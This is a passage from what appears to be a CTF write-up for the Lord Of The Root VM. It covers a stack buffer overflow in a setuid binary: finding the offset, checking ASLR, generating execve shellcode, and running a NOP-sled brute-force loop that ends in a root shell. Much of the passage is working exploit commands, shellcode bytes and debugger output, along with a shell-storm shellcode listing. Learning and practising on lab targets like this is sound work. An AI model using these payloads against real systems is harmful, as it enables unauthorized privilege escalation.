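printed, 0x41376641, is the byte sequence 'A','f','7','A' in memory order.
"""
import string


def pattern_create(length):
    """Generate `length` bytes of the Aa0Aa1...Az9Ba0... pattern."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # caller asked for more than the pattern can give


def eip_to_memory_bytes(hex_value):
    """'41376641' as gdb shows EIP -> b'Af7A', the order the bytes sit in memory."""
    return bytes.fromhex(hex_value.lower().replace("0x", ""))[::-1]


def pattern_offset(hex_value, length=1000):
    """Offset of the bytes that landed in EIP inside the pattern, or -1."""
    return pattern_create(length).find(eip_to_memory_bytes(hex_value))


if __name__ == "__main__":
    off = pattern_offset("41376641")
    print("EIP overwritten at offset", off)  # 171, as pattern_offset.rb reported
    # buf.c declares buff[159]; the 12 extra bytes are consistent with compiler
    # padding plus the saved EBP, which the register dump later in the
    # write-up shows overwritten as 0x41414141.
    print("bytes between end of buff[159] and the return address:", off - 159)
```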

Now use 4 bytes after the boundary to confirm the position of EIP.

(gdb) run $(python2 -c 'print "A" * 171 + "B" * 4')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/桌面/demo/Lord_Of_The_Root-1.0.1/file $(python2 -c 'print "A" * 171 + "B" * 4')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()


ASLR

Another approach is to fill the stack and look for a stable overflow point (similar to brute force, i.e. fuzzing). This tests how random ASLR really is; the bypass is a NOP sled combined with repeated attempts until an address collides.

[email protected]:/SECRET/door2$ ldd file 
linux-gate.so.1 => (0xb77b3000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75ec000)
/lib/ld-linux.so.2 (0xb77b5000)
[email protected]:/SECRET/door2$ ldd file
linux-gate.so.1 => (0xb76ec000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7525000)
/lib/ld-linux.so.2 (0xb76ee000)
[email protected]:/SECRET/door2$ ldd file
linux-gate.so.1 => (0xb771f000)
libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7558000)
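The ldd comparison just shown, turned into a check, as an added example that is not part of the original post: it parses several ldd runs and reports which objects move between runs. The three runs are constructed from the output above for /SECRET/door2/file; the third one deliberately lacks its ld-linux line, as on the page.

```python
"""Detect ASLR from repeated `ldd` output, as the write-up does by eye.

Added example, not from the original post. The three runs below are
constructed from the ldd output shown above; the third is missing its
ld-linux line just as the page's output is.
"""
import re

LDD_RUNS = [
    "linux-gate.so.1 => (0xb77b3000)\n"
    "libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75ec000)\n"
    "/lib/ld-linux.so.2 (0xb77b5000)\n",
    "linux-gate.so.1 => (0xb76ec000)\n"
    "libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7525000)\n"
    "/lib/ld-linux.so.2 (0xb76ee000)\n",
    "linux-gate.so.1 => (0xb771f000)\n"
    "libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7558000)\n",
]

# "<name> => <path> (0xaddr)" or "<path> (0xaddr)"; the address comes last.
LDD_LINE = re.compile(r"^\s*(\S+).*\((0x[0-9a-fA-F]+)\)\s*$")


def parse_ldd(text):
    """Map each loaded object to its load address for one ldd run."""
    found = {}
    for line in text.splitlines():
        m = LDD_LINE.match(line)
        if m:
            found[m.group(1)] = int(m.group(2), 16)
    return found


def randomized_objects(runs):
    """Objects whose load address changed between runs: evidence of ASLR."""
    parsed = [parse_ldd(r) for r in runs]
    names = set().union(*(p.keys() for p in parsed))
    # an object missing from one run (as ld-linux is in the third) is skipped
    # for that run rather than treated as a distinct address
    return sorted(n for n in names
                  if len({p[n] for p in parsed if n in p}) > 1)


def aslr_active(runs):
    """True when at least one object moved between runs."""
    return bool(randomized_objects(runs))


def page_aligned(runs):
    """Sanity check on the parse: load addresses are 4 KiB page aligned."""
    return all(addr % 0x1000 == 0
               for r in runs for addr in parse_ldd(r).values())


if __name__ == "__main__":
    print("ASLR active:", aslr_active(LDD_RUNS))
    print("moved between runs:", randomized_objects(LDD_RUNS))
```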

NOP sled overview:

One technique is to begin the exploit code with a long run of NOP (no-operation) instructions, which only advance the program counter. The attacker then only needs to guess the address of any one of the many NOP instructions, rather than the exact address at which the exploit code begins. This is called a "NOP sled", because once the program jumps into one of these NOPs it slides through the rest until the actual exploit code starts. For example, the Morris worm began with 400 NOP instructions.

When I learned buffer overflows before, nobody told me why the padding was needed; only after attacking this box did I understand the buffer protection mechanism. The address brute-forced here is 0xffffc860, the start of the NOP sled (EIP is pointed at the stack where ESP is). Once ESP points there, the payload on the stack runs and we get a shell; the next step is to brute-force until the NOP sled is hit.

(gdb) run $(python2 -c 'print "A" * 171 + "B" * 4 + "\x90" * 2000')
Starting program: /root/桌面/demo/Lord_Of_The_Root-1.0.1/file $(python2 -c 'print "A" * 171 + "B" * 4 + "\x90" * 2000')
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) info r
eax 0x0 0
ecx 0xffffd370 -11408
edx 0xffffd021 -12255
ebx 0xf7fa1ff4 -134602764
esp 0xffffc860 0xffffc860
ebp 0x41414141 0x41414141
esi 0xffffc914 -14060
edi 0xf7ffcb80 -134231168
eip 0x42424242 0x42424242
eflags 0x10246 [ PF ZF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
(gdb) x/s $esp
0xffffc860: '\220' <repeats 200 times>...

Search for a payload with shellcode search exec (this needs internet access). shellcode display 841 was meant to show the source of that entry, but the request did not succeed here.

gdb-peda$ peda help shellcode 
Generate or download common shellcodes.
Usage:
shellcode generate [arch/]platform type [port] [host]
shellcode search keyword (use % for any character wildcard)
shellcode display shellcodeId (shellcodeId as appears in search results)
shellcode zsc [generate customize shellcode]

For generate option:
default port for bindport shellcode: 16706 (0x4142)
default host/port for connect back shellcode: 127.127.127.127/16706
supported arch: x86

gdb-peda$ shellcode search exec
Connecting to shell-storm.org...
Found 170 shellcodes
ScId Title
[132] Aix - execve /bin/sh - 88 bytes
[136] Alpha - execve() - 112 bytes
[107] BSD/ppc - execve(/bin/sh) - 128 bytes
[814] BSD/x86 - setreuid(geteuid(), geteuid()) and execve(/bin/sh, /bin/sh, 0)
[95] BSD/x86 - setuid/execve - 30 bytes
[92] BSD/x86 - execve(/bin/sh) & setuid(0) - 29 bytes
[362] BSD/x86 - execve /bin/sh Crypt /bin/sh - 49 bytes
[93] BSD/x86 - execve(/bin/sh) - 27 bytes
[131] Sco/x86 - execve(/bin/sh, ..., NULL) - 43 bytes
[866] FreeBSD/x86-64 - execve - 28 bytes
[106] FreeBSD/x86-64 - exec(/bin/sh) Shellcode - 31 bytes
[104] FreeBSD/x86-64 - execve /bin/sh shellcode 34 bytes
[103] FreeBSD/x86-64 - Execve /bin/sh - Anti-Debugging
[100] FreeBSD/x86 - execve /tmp/sh - 34 bytes
[170] FreeBSD/x86 - execve /bin/sh 23 bytes
[749] FreeBSD/x86 - execv(/bin/sh) - 23 bytes
[171] FreeBSD/x86 - execve /bin/sh 37 bytes
[99] FreeBSD/x86 - execve(/bin/cat & /etc/master.passwd) - 65 bytes
[167] FreeBSD/x86 - reverse connect dl(shellcode) and execute, exit - 90 bytes
[97] FreeBSD/x86 - setuid(0)&execve({//sbin/ipf,-Faa,0},0); - 57 bytes
[96] FreeBSD/x86 - setreuid(0, 0) & execve(pfctl -d) - 56 bytes
[133] Hp-Ux - execve(/bin/sh) - 58 bytes
[139] Irix - execve(/bin/sh -c) - 72 bytes
[141] Irix - execve(/bin/sh) - 43 bytes
[140] Irix - execve(/bin/sh) - 68 bytes
--More--(25/170)
[904] Linux/ARM - execve("/bin/sh", NULL, 0) - 34 bytes
[855] Linux/ARM - execve("/bin/sh", [], [0 vars]) - 35 bytes
[671] Linux/ARM - Polymorphic execve("/bin/sh", ["/bin/sh"], NULL); - XOR - 78 bytes
[665] Linux/ARM - execve(/bin/sh, /bin/sh, 0) - 30 bytes
[698] Linux/ARM - execve(/bin/sh, [0], [0 vars]) - 27 bytes
[696] Linux/ARM - execve(/bin/sh,NULL,0) - 31 bytes
[666] Linux/ARM - setuid(0) & execve(/bin/sh, /bin/sh, 0) - 38 bytes
[819] Linux/ARM - execve(/bin/sh, [0], [0 vars]) - 30 bytes
[659] Linux/StrongARM - execve() - 47 bytes
[771] Linux/SuperH - sh4 execve(/bin/sh, 0, 0) - 19 bytes
[787] Linux/SuperH - sh4 - setuid(0) ; execve(/bin/sh, NULL, NULL) - 27 bytes
[79] Linux/mips - execve(/bin/sh) - 56 bytes
[782] Linux/mips - execve(/bin/sh, */bin/sh, 0) - 52 bytes
[792] Linux/mips - execve /bin/sh - 48 bytes
[80] Linux/mips - execve(/bin/sh,[/bin/sh],[]); - 60 bytes
[87] Linux/ppc - connect back execve /bin/sh - 240 bytes
[86] Linux/ppc - execve /bin/sh - 60 bytes
[88] Linux/ppc - read & exec shellcode - 32 bytes
[89] Linux/ppc - execve /bin/sh - 112 bytes
[83] Linux/sparc - [setreuid(0,0); execve() of /bin/sh] - 64 bytes
[82] Linux/sparc - setreuid(0,0)&standard execve() - 72 bytes
[908] Linux/RISC-V64 - execve(/bin/sh, NULL, 0) - 34 bytes
[905] Linux/x86-64 - execveat("/bin//sh") - 29 bytes
[683] Linux/x86-64 - execve(/sbin/iptables, [/sbin/iptables, -F], NULL) - 49 bytes
[806] Linux/x86-64 - Execute /bin/sh - 27 bytes
--More--(50/170)
[815] Linux/x86-64 - setreuid(0,0) execve(/bin/ash,NULL,NULL) + XOR - 85 bytes
[816] Linux/x86-64 - setreuid(0,0) execve(/bin/csh, [/bin/csh, NULL]) + XOR - 87 bytes
[817] Linux/x86-64 - setreuid(0,0) execve(/bin/ksh, [/bin/ksh, NULL]) + XOR - 87 bytes
[818] Linux/x86-64 - setreuid(0,0) execve(/bin/zsh, [/bin/zsh, NULL]) + XOR - 87 bytes
[77] Linux/x86-64 - setuid(0) + execve(/bin/sh) 49 bytes
[76] Linux/x86-64 - execve(/bin/sh, [/bin/sh], NULL) - 33 bytes
[603] Linux/x86-64 - execve(/bin/sh); - 30 bytes
[902] Linux/x86 - Followtheleader custom execve-shellcode Encoder/Decoder - 136 bytes
[900] Linux/x86 - ROT-7 Decoder execve - 74 bytes
[887] Linux/x86 - Obfuscated - chmod({passwd,shadow}) - add new root user - exec /bin/sh - 512 bytes
[886] Linux/x86 - setreuid() + exec /usr/bin/python - 54 bytes
[885] Linux/x86 - chmod + Add new root user with password + exec sh - 378 bytes
[881] Linux/x86 - sockfd trick + dup2(0,0),dup2(0,1),dup2(0,2) + execve /bin/sh - 50 bytes
[869] Linux/x86 - JMP-FSTENV execve shell - 67 bytes
[868] Linux/x86 - shift-bit-encoder execve - 114 bytes
[863] Linux/x86 - jump-call-pop execve shell - 52 bytes
[862] Linux/x86 - Download + chmod + exec - 108 bytes
[851] Linux/x86 - Obfuscated execve /bin/sh - 30 bytes
[846] Linux/x86 - Encrypted execve /bin/sh with uzumaki algorithm - 50 bytes
[845] Linux/x86 - Mutated Execve Wget - 96 bytes
[841] Linux/x86 - Tiny Execve sh Shellcode - 21 bytes
[204] Linux/x86 - execve read shellcode - 92 bytes
[237] Linux/x86 - execve() Diassembly Obfuscation Shellcode - 32 bytes
[547] Linux/x86 - execve()/bin/ash; exit; - 34 bytes
[549] Linux/x86 - setuid(); execve(); exit(); - 44 bytes
--More--(75/170)
[216] Linux/x86 - setreuid(0, 0) + execve(/bin//sh, [/bin//sh, -c, cmd], NULL);
[756] Linux/x86 - execve(/bin/dash) - 49 bytes
[541] Linux/x86 - Audio (knock knock knock) via /dev/dsp+setreuid(0,0)+execve() - 566 bytes
[250] Linux/x86 - setreuid(0,0) + execve(/bin/sh, [/bin/sh, NULL]) - 33 bytes
[251] Linux/x86 - setuid(0) setgid(0) execve("/bin/sh", ["/bin/sh", NULL]) - 37 bytes
[827] Linux/x86 - execve /bin/sh shellcode - 23 bytes
[828] Linux/x86 - execve-chmod 0777 /etc/shadow - 57 bytes
[811] Linux/x86 - execve(/bin/sh) - 28 bytes
[606] Linux/x86 - execve(/bin/bash, [/bin/sh, -p], NULL) - 33 bytes
[607] Linux/x86 - polymorphic execve(/bin/bash, [/bin/sh, -p], NULL) - 57 bytes
[57] Linux/x86 - execve(rm -rf /) - 45 bytes
[222] Linux/x86 - setuid(0) setgid(0) execve(echo 0 > /proc/sys/kernel/randomize_va_space) - 79 bytes
[585] Linux/x86 - execve(/bin/sh) - 25 bytes
[589] Linux/x86 - execve(a->/bin/sh) - 14 bytes
[597] Linux/x86 - setreud(getuid(), getuid()) & execve(/bin/sh) - 34 bytes
[599] Linux/x86 - setuid(0) ^ execve(/bin/sh, 0, 0) - 27 bytes
[598] Linux/x86 - setuid(0) + execve(/bin/sh,...) - 29 bytes
[219] Linux/x86 - stdin re-open and /bin/sh execute
[358] Linux/x86 - execve /bin/sh encrypted - 58 bytes
[256] Linux/x86 - execve /bin/sh anti-ids 40 bytes
[58] Linux/x86 - execve(/bin//sh/,[/bin//sh],NULL) - 22 bytes
[215] Linux/x86 - setuid(0) + execve(/bin//sh, [/bin//sh], NULL) - 28 bytes
[483] Linux/x86 - execve(/sbin/halt,/sbin/halt) - 27 bytes
[477] Linux/x86 - execve(/sbin/reboot,/sbin/reboot) - 28 bytes
[476] Linux/x86 - execve(/sbin/shutdown,/sbin/shutdown 0) - 36 bytes
--More--(100/170)
[472] Linux/x86 - setuid(0) & execve(/bin/sh,0) - 25 bytes
[473] Linux/x86 - setuid(0), setgid(0) & execve(/bin/sh,[/bin/sh,NULL]) - 33 bytes
[758] Linux/x86 - execve(/bin/cat, /etc/shadow, NULL) - 42 bytes
[399] Linux/x86 - setreuid(geteuid(),geteuid()),execve(/bin/sh,0,0) - 34bytes
[54] Linux/x86 - upload & exec - 189 bytes
[74] Linux/x86 - Perl script execution 99 bytes + script length
[810] Linux/x86 - setreuid(0,0) execve("/bin/zsh", [/bin/zsh, NULL]) + XOR - 53 bytes
[808] Linux/x86 - setreuid(0,0) execve("/bin/csh", [/bin/csh, NULL]) + XOR - 53 bytes
[809] Linux/x86 - setreuid(0,0) execve("/bin/ksh", [/bin/ksh, NULL]) + XOR - 53 bytes
[807] Linux/x86 - setreuid(0,0) execve(/bin/ash,NULL,NULL) + XOR - 58 bytes
[555] Linux/x86 - execve() - 51bytes
[643] Linux/x86 - give all user root access when execute /bin/sh - 45 bytes
[632] Linux/x86 - sys_execve(/bin/sh, -c, ping localhost) - 55 bytes
[631] Linux/x86 - sys_setuid(0) & sys_setgid(0) & execve (/bin/sh) - 39 bytes
[575] Linux/x86 - execve /bin/sh - 21 bytes
[59] Linux/x86 - HTTP/1.x GET, Downloads & execve() - 111 bytes+
[230] Linux/x86 - anti-debug trick (INT 3h trap) execve(/bin/sh, [/bin/sh, NULL], NULL) - 39 bytes
[228] Linux/x86 - execve /bin/sh xored for Intel x86 CPUID 41 bytes
[226] Linux/x86 - execve(/bin/sh, [/bin/sh, NULL]) + Bitmap - 27 bytes
[225] Linux/x86 - execve(/bin/sh, [/bin/sh, NULL]) + RIFF Header - 28 bytes
[224] Linux/x86 - execve(/bin/sh, [/bin/sh, NULL]) + RTF header - 30 bytes
[223] Linux/x86 - execve(/bin/sh, [/bin/sh, NULL]) + ZIP Header - 28 bytes
[229] Linux/x86 - execve(/bin/sh, [/bin/sh], NULL) / encoded by +1 - 39 bytes
[557] Linux/x86 - setuid(0) & execve(/bin/cat /etc/shadow) - 49 bytes
[558] Linux/x86 - setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
--More--(125/170)
[752] Linux/x86 - execve (/bin/sh) - 21 Bytes
[206] Linux/x86 - connect back, download a file and execute - 149 bytes
[261] Linux/x86 - setreuid & execve - 31 bytes
[363] Linux/x86 - break chroot execve /bin/sh - 80 bytes
[517] Linux/x86 - execve(/bin/sh,0,0) - 21 bytes
[516] Linux/x86 - setuid(0) & execve(/bin/sh,0,0) - 28 bytes
[551] Linux/x86 - setresuid(0,0,0); execve /bin/sh; exit; - 41 bytes
[61] Linux/x86 - setuid(0) & execve(/bin/sh,0,0) - 28 bytes
[369] Linux/x86 - shared memory exec - 50 bytes
[466] Linux/x86 - setuid() & execve() - 27 bytes
[249] Linux/x86 - Magic Byte Self Modifying Code for surviving - execve() _exit() - 76 bytes
[248] Linux/x86 - Radically Self Modifying Code - execve & _exit() - 70 bytes
[546] Linux/x86 - execve of /bin/sh /tmp/p00p - 70 bytes
[544] Linux/x86 - execve of /sbin/ipchains -F - 70 bytes
[545] Linux/x86 - execve() of /sbin/iptables -F - 70 bytes
[108] NetBSD/x86 - execve(/bin/sh) - 68 bytes
[109] NetBSD/x86 - setreuid(0, 0); execve(/bin//sh, ..., NULL); - 29 bytes
[163] OpenBSD/x86 - execve(/bin/sh) - 23 bytes
[120] Osx/ppc - shellcode execve(/bin/sh)
[129] Osx/ppc - execve(/bin/sh,[/bin/sh],NULL)& exit() - 72 bytes
[692] Osx/x86 - execve(/bin/sh) - 24 bytes
[240] Solaris/mips - download and execute - 278 bytes
[385] Solaris/sparc - setreuid(geteuid()), setregid(getegid()), execve /bin/sh
[116] Solaris/sparc - execve(/bin/sh) - 52 bytes
[613] Solaris/x86 - execve(/bin/sh, /bin/sh, NULL) - 27 bytes
--More--(150/170)
[114] Solaris/x86 - add services and execve inetd - 201 bytes
[113] Solaris/x86 - execve /bin/sh toupper evasion - 84 bytes
[386] Solaris/x86 - execve /bin/sh - 43 bytes
[112] Solaris/x86 - setuid(0)&execve(//bin/sh)&exit(0) - 39 bytes
[111] Solaris/x86 - setuid(0)&execve(/bin/cat, /etc/shadow)&exit(0) - 59 bytes
[899] Windows/64 - Obfuscated Shellcode x86/x64 Download And Execute [Use PowerShell] - Generator
[150] Windows/64 - (URLDownloadToFileA) download and execute - 218+ bytes
[673] Windows - Safari JS JITed shellcode - exec calc (ASLR/DEP bypass)
[767] Windows - Vista/7/2008 - download and execute file via reverse DNS channel
[148] Windows - telnetbind by winexec - 111 bytes
[581] Windows - XP sp3 (Ru) WinExec+ExitProcess cmd shellcode - 12 bytes
[146] Windows - XP download and exec source
[766] Windows - Allwin WinExec add new local administrator + ExitProcess Shellcode - 272 bytes
[662] Windows - Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes
[701] Windows - null-free 32-bit Windows shellcode that executes calc.exe - 100 bytes
[391] Windows - WinExec() Command Parameter - 104 bytes
[392] Windows - download and execute - 124 bytes
[159] Windows - Download and Execute Shellcode Generator
[162] Windows - download & exec shellcode - 226 bytes+
[157] Windows - connectback, receive, save and execute shellcode


Buffer overflow

kali下gdb安装peda_pwndbg_gef走过的坑 - 知乎.pdf

There is a pitfall here: gdb plugins can only be used and loaded one at a time, selected in the configuration file, so debugging and shellcode generation cannot be used together; comment out the plugin line when switching. By default the file does not exist.

echo "source ~/peda/peda.py" >> ~/.gdbinit
└─# cat ~/.gdbinit             

source /root/peda/peda.py

Here I generate the shellcode; since this is local privilege escalation, the payload is the same.

gdb-peda$ shellcode generate x86/linux exec
# x86/linux/exec: 24 bytes
shellcode = (
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
"\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
)

Check whether any other protections are enabled

gdb-peda$ checksec 
Warning: 'set logging off', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled off'.

Warning: 'set logging on', an alias for the command 'set logging enabled', is deprecated.
Use 'set logging enabled on'.

CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : disabled

ESP above was 0xffffc860; because of endianness it has to be written in reversed byte order. After generating the shellcode, comment out the plugin and return to the debugging session. I use Python 2 for the output here; adjust as needed.

run $(python2 -c 'print "A" * 171 + "\x60\xc8\xff\xff" + "\x90" * 20000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')

Here the overflow succeeded for me locally.

└─# gdb -q file
Reading symbols from file...
(No debugging symbols found in file)
(gdb) run $(python2 -c 'print "A" * 171 + "\x60\xc8\xff\xff" + "\x90" * 20000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')
Starting program: /root/桌面/demo/Lord_Of_The_Root-1.0.1/file $(python2 -c 'print "A" * 171 + "\x60\xc8\xff\xff" + "\x90" * 20000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"')

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
process 13681 is executing new program: /usr/bin/dash
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
#

Back on the target, we need to determine again which door holds the buf binary.

for a in {1..1000}; do ./file $(python -c 'print "A" * 171 + "\xa0\x64\x8b\xbf" + "\x90" * 20000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"'); done

Wait a moment and we get the privileges.

[email protected]:/SECRET$ ls -alhR
.:
total 20K
drwxr-xr-x 5 root root 4.0K Sep 22 2015 .
drwxr-xr-x 23 root root 4.0K Sep 22 2015 ..
drwxr-xr-x 2 root root 4.0K Nov 13 22:42 door1
drwxr-xr-x 2 root root 4.0K Nov 13 22:42 door2
drwxr-xr-x 2 root root 4.0K Nov 13 22:42 door3

./door1:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 22:42 .
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ..
-rwsr-xr-x 1 root root 7.2K Sep 17 2015 file

./door2:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 22:42 .
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ..
-rwsr-xr-x 1 root root 5.1K Sep 22 2015 file

./door3:
total 16K
drwxr-xr-x 2 root root 4.0K Nov 13 22:42 .
drwxr-xr-x 5 root root 4.0K Sep 22 2015 ..
-rwsr-xr-x 1 root root 7.2K Sep 17 2015 file
[email protected]:/SECRET$ cd door2/
[email protected]:/SECRET/door2$ ls
file
[email protected]:/SECRET/door2$ for a in {1..1000}; do ./file $(python -c 'print "A" * 171 + "\xa0\x64\x8b\xbf" + "\x90" * 20000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"'); done
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)

......
......

Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
uid=1000(smeagol) gid=1000(smeagol) euid=0(root) groups=0(root),1000(smeagol)
#


Buffer overflow, method 2

A second way of debugging the same binary; the approach is similar, but the analysis is done in pwndbg.

sudo pip3 install pwntools -i https://mirrors.aliyun.com/pypi/simple/
apt install --fix-missing python3-pip
apt install gdb

# install pwndbg for gdb
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh

vim ~/.gdbinit
source /xx/pwndbg/pwndbg-dev/pwndbg-dev/gdbinit.py   # use the actual path of your checkout
source ~/.gdbinit

File analysis

Get into the habit of collecting information first: pull the printable strings out of the binary.

strings file

If we did not already know that this is a buffer-overflow binary, we would have to dissect it and look at which functions it calls (unsafe string handling, for example):

objdump -d --no-show-raw-insn file


Finding the overflow offset

Provoke the crash with a 1000-byte cyclic pattern as the argument; the program faults with EIP = 0x41376641, four bytes taken from the pattern.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

pwndbg> run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Starting program: /root/demo/file Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x41376641 in ?? ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
───────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────
EAX 0x0
*EBX 0xf7fa0ff4 (_GLOBAL_OFFSET_TABLE_) ◂— 0x220d8c
*ECX 0xffffd3f0 ◂— 'Bh1Bh2B'
*EDX 0xffffd0b2 ◂— 'Bh1Bh2B'
*EDI 0xf7ffcb80 (_rtld_global_ro) ◂— 0x0
*ESI 0xffffce34 ◂— 0x6c41386c ('l8Al')
